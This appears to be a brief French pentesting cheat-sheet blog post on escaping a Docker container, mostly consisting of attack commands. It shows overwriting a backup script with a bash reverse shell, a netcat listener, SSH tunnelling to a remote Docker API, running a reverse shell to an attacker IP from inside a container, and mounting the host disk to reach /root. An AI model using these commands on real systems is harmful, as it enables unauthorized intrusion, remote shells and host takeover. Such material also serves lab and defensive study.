Sortir d’un container docker

Nous pouvons voir que nous sommes dans un docker en allant dans /opt/backups

Nous pouvons sortir en écrasant backup.sh

echo “#!/bin/bash” > backup.sh
echo “/bin/bash -c ‘bash -i >& /dev/tcp//1234 0>&1′” >> backup.sh

Il existe aussi des scripts d’énumération des dockers

Voir la vulnérabilité CVE-2019-14271

parfois nous pouvons nous connecter à un serveur docker à partir de la machine de l’attaquant


nc -nlvp 4444
ssh -fN -p 2222 L 8080:localhost:8080 user@10.10.10.10
docker -H tcp://localhost:8080 container ls
docker -H tcp://localhost:8080 container exec containername whoami
docker -H tcp://localhost:8080 container exec containername bash -c "bash -i &>/dev/tcp/10.9.0.24/4444 0>&1"
fdisk -l
mkdir /mnt/tmp; mount /dev/xvda1 /mnt/tmp
cd /mnt/tmp/root

Leave a Reply